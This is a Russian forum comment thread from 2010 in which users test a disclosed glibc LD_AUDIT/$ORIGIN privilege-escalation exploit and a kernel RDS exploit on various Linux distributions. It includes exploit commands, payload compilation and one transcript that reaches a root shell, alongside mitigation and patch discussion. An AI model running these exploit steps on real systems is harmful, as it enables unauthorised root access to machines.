  • 4.38, paxuser (?), 16:49, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Я mysql не пользуюсь, так что меня это не волнует. GLSA по
    > критическим уязвимостям быстро выходят.

    О скорости выхода GLSA - это вы на #gentoo-security расскажите, чтобы разработчики тоже порадовались: проблема-то надуманная, оказывается.

     
  • 4.77, maxkit (ok), 19:18, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Я mysql не пользуюсь

    Ну и аргументы.

     

  • 1.16, Толстый (ok), 16:02, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    на CentOS 5 сработало!
     
  • 1.18, Аноним (-), 16:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    на третьем шаге уже не дает
    $ exec 3 < /tmp/exploit/target
    bash: /tmp/exploit/target: Отказано в доступе
     
     
  • 2.21, Вова (?), 16:12, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > на третьем шаге уже не дает
    > $ exec 3 < /tmp/exploit/target
    > bash: /tmp/exploit/target: Отказано в доступе

    +1, на двух гентах пытался, дома  и на работе

     
     
  • 3.82, ozs (ok), 20:02, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ****@***:~$ mkdir /tmp/exploit
    ****@***:~$ ln /bin/ping /tmp/exploit/target
    ****@***:~$ exec 3< /tmp/exploit/target
    bash: /tmp/exploit/target: Отказано в доступе

    На Slackware 13.1

     
     
  • 4.96, Ytch (?), 22:37, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    По умолчанию на Zenwalk 6.4 аналогично.
    Если на /bin/ping рутом дать права на чтение и проделать все еще раз, то закрывается терминал как писали выше.
     

  • 1.26, svchost (ok), 16:29, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.
    Сильно не пинайте, но иногда такие мысли возникают.
     
     
  • 2.31, Аноним (-), 16:38, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.

    Сильно не пинайте, но иногда такие мысли возникают.


    В ХР необходимости не было получать такой доступ. Зловреды и так работали. Поэтому никто и не интересовался.

     
  • 2.35, name (??), 16:44, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    вирусы типа kido отлично знают, в отличие от вас.
     
  • 2.59, User294 (ok), 17:55, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Господи, что вы там курите если не понимаете разницы между ядром и либой привиле... текст свёрнут, показать
     
  • 2.68, Зилибоба (ok), 18:41, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    чтоб глупости в голову не лезли, нужно больше читать умных статей, например, http://www.microsoft.com/technet/security/advisory/2269637.mspx.
     
     
  • 3.79, Пользователь Debian (?), 19:34, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    "Server Error in '/technet' Application."

    Кажется, Вы запостили в этом URL'е эксплойт IIS!!!111

     
     
  • 4.108, Аноним (-), 00:30, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    точку в конце адреса убери
     
  • 4.109, Митра (?), 00:31, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    там точка в конце лишняя.
     
  • 3.93, User294 (ok), 22:26, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А это вообще лулзов пачка :). Более того - была еще фича: предложить юзеру скачать DLL :).А потом ... потом когда юзер ее скачает, при старте фурифокса она поюзается *до* системной библы с таким же именем. При чем дыра была специфичная для винды почему-то. Видимо остальные системы не настолько "умны" чтобы на свой зад искать и грузить либы откуда попало (current directory?).

    P.S. алсо, говорят что stuxnet пробивает винду от просто факта втыкания флехи. Какая-то дыра в обработке ярлыков, чтоли. Прямо так, без старта программы авторана даже, просто воткнули - и вас поимели. Что-то из этого вроде даже до сих пор не запатчено если меня не подводит склероз по части секурити уведомлений. Читайте сайты по секурити в общем - узнаете много нового. Спокойно спать перестанете заодно :)

     
     
  • 4.133, Добрый Аноним (?), 11:53, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > А это вообще лулзов пачка :). Более того - была еще фича:
    > предложить юзеру скачать DLL :).А потом ... потом когда юзер ее
    > скачает, при старте фурифокса она поюзается *до* системной библы с таким
    > же именем. При чем дыра была специфичная для винды почему-то. Видимо
    > остальные системы не настолько "умны" чтобы на свой зад искать и
    > грузить либы откуда попало (current directory?).

    ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать что та же дыра и в лунухах имеет(ла) место быть.

     
     
  • 5.137, Зилибоба (ok), 13:42, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> А это вообще лулзов пачка :). Более того - была еще фича:
    >> предложить юзеру скачать DLL :).А потом ... потом когда юзер ее
    >> скачает, при старте фурифокса она поюзается *до* системной библы с таким
    >> же именем. При чем дыра была специфичная для винды почему-то. Видимо
    >> остальные системы не настолько "умны" чтобы на свой зад искать и
    >> грузить либы откуда попало (current directory?).
    > ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
    > что та же дыра и в лунухах имеет(ла) место быть.

    Во первых - была, а во вторых, пруф давайте.

     
     
  • 6.144, Добрый Аноним (?), 14:37, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Во первых не была , такие баги постоянно появляются от приложения к приложению ... текст свёрнут, показать
     
  • 5.139, paxuser (?), 14:15, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
    > что та же дыра и в лунухах имеет(ла) место быть.

    Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал".

     
     
  • 6.145, Добрый Аноним (?), 14:40, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >> ага, щаз. читайте сводки уязвимостей не только с опеннета и будете знать
    >> что та же дыра и в лунухах имеет(ла) место быть.
    > Не в "лунухах", а в Debian. Этот дистрибутив давно себя "зарекомендовал".

    да какая разница? главное, что это проблема не только вин система, как некоторые тут утверждают.

     

  • 1.27, Аноним (-), 16:31, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Особенно порадовало отношение разработчиков glibc..
    бага есть? - ну есть, ну и нафик - не будем ее фиксить, не сломают.
    А если сломают? - тогда и пофиксим.

    Чем-то это напоминает отношение MS к выпуску обновлений.
    Не ужели FSF не может нормально следить за ключевым проектом?

     
     
  • 2.36, z (??), 16:45, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    линейкой по пальцам через интернеты =)
     

  • 1.29, savant (ok), 16:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Arch, при выполнении LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 шелл просто падает
     
  • 1.40, aNoN (?), 16:58, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В funtoo тоже suid бит для хардлинка не выставляется, поэтому не работает. В debiane - лехко, но падает шелл.
     
     
  • 2.63, User294 (ok), 18:28, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > В debiane - лехко, но падает шелл.

    Ога, с ассертом в libc.

     
  • 2.65, tamerlan311 (?), 18:34, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    в Дебиане давно используется eglibc вместо классической libc
     
     
  • 3.69, Sylvia (ok), 18:46, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    и несмотря на то, что eglibc всего лишь форк от glibc,
    в eglibc ( 2.11.2 ) эксплоит не работает.

     

  • 1.42, Аноним (-), 17:01, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ~ $ mkdir /tmp/exploit
    ~ $ ln /bin/ping /tmp/exploit/target
    ~ $ exec 3< /tmp/exploit/target
    -bash: /tmp/exploit/target: Отказано в доступе


    gentoo ~x86_64

     
     
  • 2.71, Sylvia (ok), 18:56, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    suid бинарник на который делается линк должен быть читаемым
    mode 4755 например, если он нечитаем, но выполним, то exec 3 не пройдет.
     

  • 1.44, User294 (ok), 17:03, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А "презренные бубунты" этот сплойт не пробирает. Посему странно ждать исправления для них - а они походу не эксплойтабельны и так?! Какой редхатчик новость писал? Он был не в курсе что в убунте/дебияне юзается другая либа - eglibc? Или какого буя про исправления написано? Пусть автор новости объяснит свою логику наведения паники? oO

    В бубунтах шелл просто убивается с assertion failed. И фигъ мне а не рут, соответственно. Так что приветы крЮтому редхату и Ульриху. Энтерпрайзнички, а на стандарт вот забили :-).

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.55, Аноним (-), 17:30, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    с openSuSE аналогично - умирает шелл.
     
  • 2.56, anonymous (??), 17:31, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >другая либа - eglibc

    Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC) that is designed to work well on embedded systems.

     
     
  • 3.61, User294 (ok), 18:19, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Embedded GLIBC (EGLIBC) is a variant of the GNU C Library (GLIBC)
    > that is designed to work well on embedded systems.

    Спасибо, Кэп. Но это не отменяет факта что приведенный эксплойт работает только на редхатах, но не катит в дебиянообразных. Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.

     
     
  • 4.162, solardiz (ok), 17:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Судя по всему как раз потому что либа другая. Я где-то ошибаюсь в моей логике? Тогда покажите где.

    Да, ошибаешься. Тут дело не в glibc vs. eglibc, а в опциях сборки. -DNDEBUG убирает assert'ы, которые, в теории, на уже отлаженном коде не нужны. А реально - в данном случае помогали. То, что срабатывает assert внутри glibc/eglibc - это признак наличия бага - так что исправление для Debian и Ubuntu должно появиться. Возможно, оно не будет считаться security fix'ом, хотя уверенности в том что assert'а было достаточно, чтобы спастись от всех способов атаки, нет.

    А вот Owl и ALT Linux этой проблеме не подвержены по другим причинам. :-)

     

  • 1.47, Аноним (-), 17:19, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    $ LD_AUDIT="\$ORIGIN" exec /proc/$$/fd/3
    bash: /proc/30974/fd/3: Permission denied
    bash: exec: /proc/30974/fd/3: cannot execute: Success
    $

    хз... видимо я так давно не обновлялся, что LD_AUDIT у меня не поддерживается =))

     
     
  • 2.52, Аноним (-), 17:25, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    а, нет, вру, дескриптор перепутал, assert срабатывает:

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     

  • 1.50, Аноним (-), 17:24, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
     
  • 1.54, прххффф (?), 17:30, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    На Debian не работает. Вывод: RedHat дырявый :-)

    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 271: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
  • 1.57, Аноним (-), 17:39, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    в ubuntu 10.10:

    $ mkdir /tmp/exploit
    $ ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

     
     
  • 2.80, Sylvia (ok), 19:37, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    жесткую ссылку можно сделать в пределах 1 устройства, у вас наверное /tmp и /bin на разных партициях/устройствах
     
     
  • 3.84, val (??), 20:32, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    у меня тоже ubuntu 10.10. tmp и bin на одном разделе. то же самое выдает.
     

  • 1.64, Vasily Pupkin (?), 18:34, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] ==
     
  • 1.66, Аноним2 (?), 18:35, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В основной ссылке по новости есть второй метод атаки
    http://seclists.org/fulldisclosure/2010/Oct/257

    Почему его еще никто не попробовал? Там ссылки
    делать не придется.

     
     
  • 2.70, Аноним (-), 18:53, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    пробовали не работает

    bash: line 28: /tmp/exploit/traget: No such file or directory

     
     
  • 3.76, Аноним2 (?), 19:15, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Что-то вы не то делаете видимо, но и у меня не получается Это как раз способ дл... текст свёрнут, показать
     
     
  • 4.88, Аноним (-), 21:38, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    funtoo, glibc-2.11-r1
    Assertion ... failed
     
  • 4.90, ozs (ok), 21:55, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    >>>$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &

    [1] 5559

    А что вот это [1] 5559 , у меня пишет такая команда не найдена.

     
     
  • 5.99, User294 (ok), 23:06, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > А что вот это [1] 5559 , у меня пишет такая команда не найдена.

    Это? Это - стопроцентный EPIC FAIL! :))))

    Хинт: ввести выданные шеллом номер job и его pid как команду - круто придумано. Вы б думали что вводите, а? Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.

     
     
  • 6.116, ozs (ok), 02:11, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Спасибо
    >>Иначе вы рискуете оказаться однажды в роли обезьяны с гранатой.

    От этого никто не застрахован.

     
  • 4.117, ozs (ok), 02:17, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    "[1] 5559"чей pid должен быть?
     
  • 2.74, Sylvia (ok), 19:08, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    sylvia@evy /var/tmp $ pkill -n -t $(tty | sed 's#/dev/##') sleep
    -bash: line 3: 18668 Terminated              sleep 1h
    sylvia@evy /var/tmp $ warning: debug option 'nonsense' unknown; try LD_DEBUG=help
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!


    с eglibc 2.11.2 со вторым способом также срабатывает ассерт

     
  • 2.78, AX (?), 19:21, 19/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > В основной ссылке по новости есть второй метод атаки
    > http://seclists.org/fulldisclosure/2010/Oct/257

    После выполнения pkill:

    warning: debug option 'nonsense' unknown; try LD_DEBUG=help
    Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

    > Там ссылки делать не придется.

    (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN" /tmp/exploit/target 2>&1)

    В первой же строке запуск всё той же ссылки на ping.

     

  • 1.67, Vasily Pupkin (?), 18:41, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    У меня вообще ни на одной машине не получилось заэксплуатировать.
    1. У меня всё с SUID на отдельных разделах
    2. Всё с suid только на 111
    3. Даже когда я это всё пофиксил, всё равно вываливается ассёрт :]
     
  • 1.72, Al1966 (?), 18:57, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Fedora12 получилось. :(
     
  • 1.89, Добрый Аноним (?), 21:40, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Вот, а кто-то мне тут рассказывал, что в линухах держать все на одном разделе можно спокойно, там людей не тревожат переполнения разделов, опции монтирования, а теперь не тревожат еще и всякие уязвимости....
    О безопасности думать надо, да.
     
  • 1.91, i (??), 22:02, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    чето облом на 2й же команде
    ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки «/tmp/exploit/target» => «/bin/ping»: Неверная ссылка между устройствами

    ладно создал в /home но опять же:
    ls -l /proc/$$/fd/3
    ls: невозможно получить доступ к /proc/18810/fd/3: Нет такого файла или каталога

    glibc-2.11.2

     
  • 1.97, balex (??), 22:37, 19/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Опять этот SUID... Ну и как всегда о сто и одном способе "как получить линукс с правами обычного пользователя" тут не поведали. Те же юзеры, которые работают в удалённых xnix окружениях наверное и так бояться что-нить "уронить", конечно без дятлов никуда...
     
  • 1.103, Аноним (-), 00:06, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    andrey@evilhorse /var/run/exploit $ ls -ld .
    drwxrwxrwx 2 andrey andrey 4096 Окт 19 23:03 .
    andrey@evilhorse /var/run/exploit $ ln /bin/ping /var/run/exploit/target
    andrey@evilhorse /var/run/exploit $ ls -l
    итого 28
    -rws--x--x 2 root root 26508 Авг 18  2008 target
    andrey@evilhorse /var/run/exploit $ exec 3< /var/run/exploit/target
    bash: /var/run/exploit/target: Отказано в доступе
    andrey@evilhorse /var/run/exploit $

    не работает

     
     
  • 2.105, Аноним (-), 00:13, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    если пофиксить права на /bin/ping:

    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

    и падение

     

  • 1.113, Аноним (-), 01:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    тестовая система, собранна из исходников
    ./configure && make && make install
    , ни каких патчей безопасности - тот же ".. Assertion .."
     
  • 1.115, ifel (??), 02:08, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    CO5 i386/x86_64 - пашет на ура
    CO4 - не работает

    На CO5 мы уже собрали rpms patched и разлили по серверам.

     
  • 1.124, d4r (?), 07:58, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0 на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC 2010 i686 i686 i386 GNU/Linux
     
     
  • 2.126, killer1804 (??), 08:35, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > мда, 2 ехплоита за один вечер, етот и http://www.exploit-db.com/exploits/15285. уид=0
    > на Linux box 2.6.34.7-56.fc13.i686 #1 SMP Wed Sep 15 03:33:58 UTC
    > 2010 i686 i686 i386 GNU/Linux

    [user0@video_srv ~]$ ./expl.bin
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Resolving kernel addresses...
    [+] Resolved cap_ptrace_traceme to 0xc1149490
    [+] Resolved commit_creds to 0xc1060fe0
    [+] Resolved prepare_kernel_cred to 0xc1060db0
    [*] Failed to resolve kernel symbols.
    [user0@video_srv ~]$

    [user0@video_srv ~]$ uname -a
    Linux video_srv 2.6.32-ARCH

    увы и ах

     
     
  • 3.127, Вова (?), 09:18, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/

    $ ./a.out
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Resolving kernel addresses...
    [+] Resolved security_ops to 0xffffffff81c44e50
    [+] Resolved default_security_ops to 0xffffffff81a3daa0
    [+] Resolved cap_ptrace_traceme to 0xffffffff811c73f4
    [+] Resolved commit_creds to 0xffffffff81056b7b
    [+] Resolved prepare_kernel_cred to 0xffffffff81056a37
    [*] Could not open socket.
    ~ $

    uname -a
    Linux  2.6.34.1 #5 SMP Tue Aug 24 15:56:29 MSD 2010 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ AuthenticAMD GNU/Linux

     
     
  • 4.128, korrado (?), 09:44, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    ls -l /bin/ping
    если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты)
    если стоит, --x, то не работает (Слаки и другие)
     
     
  • 5.138, Вова (?), 13:45, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > ls -l /bin/ping
    > если для не юзера стоит r-x, эсплойт работает (Мандривы, Федоры, Убанты)
    > если стоит, --x, то не работает (Слаки и другие)

    в данной теме присутствуют два эксплойта, один скриптом (вы о нём), другой программкой.

     

  • 1.132, АнонимМ (?), 11:48, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не хотит.

    bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
    payload.c:7: ошибка: redefinition of ‘init’
    payload.c:2: ошибка: previous definition of ‘init’ was here

    glibc-2.5-18
    Что-то пока не страшно.

     
     
  • 2.134, ifel (??), 12:02, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > Что-то в Red Hat Enterprise Linux Server release 5.1 (Tikanga) работать не
    > хотит.
    > bea@yam-ind:/tmp>gcc -w -fPIC -shared -o /tmp/exploit payload.c
    > payload.c:7: ошибка: redefinition of ‘init’
    > payload.c:2: ошибка: previous definition of ‘init’ was here
    > glibc-2.5-18
    > Что-то пока не страшно.

    Что-то у Вас в .c file ошибка, а не работать не хочет. Проверьте, что вставили все один раз и без спец символов.

    Да и RHEL 5.1 как бы outdated уже, там остального добра думаю хватит, даже если это и не работает.

     
     
  • 3.146, АнонимМ (?), 14:41, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да правда ваша - работает.
     

  • 1.135, TS (ok), 12:59, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Умные люди давно следуют рекомендациям по безопасности. например от NSA.
    Открываем "Guide to the Secure Configuration of Red Hat Enterprise Linux 5" - http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf - читаем -
    2.1.1.1.1 Create Separate Partition or Logical Volume for /tmp
    2.1.1.1.2 Create Separate Partition or Logical Volume for /var
    ...
    2.1.1.1.5 Create Separate Partition or Logical Volume for /home if Using Local Home Directories
    ...
    2.2.1.3 Add nodev, nosuid, and noexec Options to Temporary Storage Partitions
    2.2.1.4 Bind-mount /var/tmp to /tmp
    ...
    2.2.3.4 Find Unauthorized SUID/SGID System Executables
     
  • 1.148, буба (?), 15:31, 20/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ubuntu 10.04:

    moo@moo:~$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!

     
     
  • 2.150, буба (?), 15:45, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    CentOS 5.3
    [moo@co53 ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    [root@co53 ~]#
     
     
  • 3.154, буба (?), 16:42, 20/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    После "yum update glibc" с версии 2.5.34 до 2.5.49 и пересборки эксплоит все-равно работет на CentOS.
     
     
  • 4.190, буба (?), 18:41, 21/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Сегодня вышел апдейт glibc, после которого $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3  вырубает шелл.
     

  • 1.191, Аноним (-), 20:26, 21/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    I just can't create the link from /bin/ping to /tmp/exploit/target
    ln: creating hard link 'exploit/target' => '/bin/ping': Invalid cross-device link
     
  • 1.192, paxuser (ok), 00:18, 22/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Сегодня на #grsecurity:

    <taviso> kees: we pwned you :)
    <taviso> (check your mail)
    <kees> taviso: aaah craps
    <kees> taviso: nice work :)
    <taviso> thanks :D
    <spender> AHH CRAPS
    <kees> taviso: well, no worries, the glibc update was waiting in the wings anyway. I'll get it published. :)
    <spender> I INFERR THAT UBUNTU IS VULN TO THE GLIBC BUG
    <spender> and i guess all other eglibc users too? :p

     
     
  • 2.193, solardiz (ok), 02:33, 23/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    Да, второй раунд: http://lists.openwall.net/full-disclosure/2010/10/22/15

    Исправление для Debian: http://lists.openwall.net/full-disclosure/2010/10/22/16

     

  • 1.194, Аноним (-), 06:07, 23/10/2010 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    OpenSUSE 11.3 // Kernel 2.6.35.4 + Ubuntu patches + BFQ + BFS
    Наверное yama мли apparmor виноваты....

     
     
  • 2.195, paxuser (ok), 08:06, 23/10/2010 [^] [^^] [^^^] [ответить]  
  • +/
    > ln /bin/ping /tmp/exploit/target
    > ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Для эксплуатации второй уязвимости хардлинки не нужны.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    MIRhosting
    Inferno Solutions
    Hosting by Ihor
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2019 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру